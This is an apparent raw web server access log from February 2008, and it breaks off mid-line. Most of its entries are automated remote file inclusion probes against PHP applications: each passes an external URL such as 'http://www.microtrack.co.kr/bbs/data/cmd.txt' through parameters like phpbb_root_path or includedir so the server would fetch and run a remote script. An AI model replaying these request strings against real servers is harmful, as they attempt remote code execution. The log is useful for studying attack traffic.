80.66.162.71 - - [10/Feb/2008:20:33:22 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.66.162.71 - - [10/Feb/2008:20:33:22 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.66.162.71 - - [10/Feb/2008:20:33:35 -0800] "GET /logs/access_071022.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.66.162.71 - - [10/Feb/2008:20:33:57 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071112.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.66.162.71 - - [10/Feb/2008:20:33:58 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.66.162.71 - - [10/Feb/2008:20:35:58 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.thinklabsmedical.com/images/M_images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:20:36:07 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:20:36:07 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
85.31.196.28 - - [10/Feb/2008:20:36:37 -0800] "GET /send_reminders.php?includedir=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:20:46:33 -0800] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:20:46:33 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:20:46:33 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:20:46:44 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
83.142.25.74 - - [10/Feb/2008:20:46:44 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.toulouseangloexchange.com"
216.55.166.250 - - [10/Feb/2008:20:46:52 -0800] "GET /logs/access_080127.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
70.86.43.42 - - [10/Feb/2008:20:47:13 -0800] "GET /logs/access_071231.log/send_reminders.php?includedir=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
70.86.43.42 - - [10/Feb/2008:20:47:14 -0800] "GET /logs/send_reminders.php?includedir=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
125.46.36.186 - - [10/Feb/2008:20:47:27 -0800] "GET /logs/%3Cpath%3Ehttp://hackpedia.us/txt/b??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
210.66.146.133 - - [10/Feb/2008:20:48:20 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://theamericandreamhomepage.com/incs/sas/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.6.28.139 - - [10/Feb/2008:20:49:01 -0800] "GET /?D=A HTTP/1.0" 200 903 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
218.252.91.7 - - [10/Feb/2008:20:49:13 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://sbn.poilpark.net/doc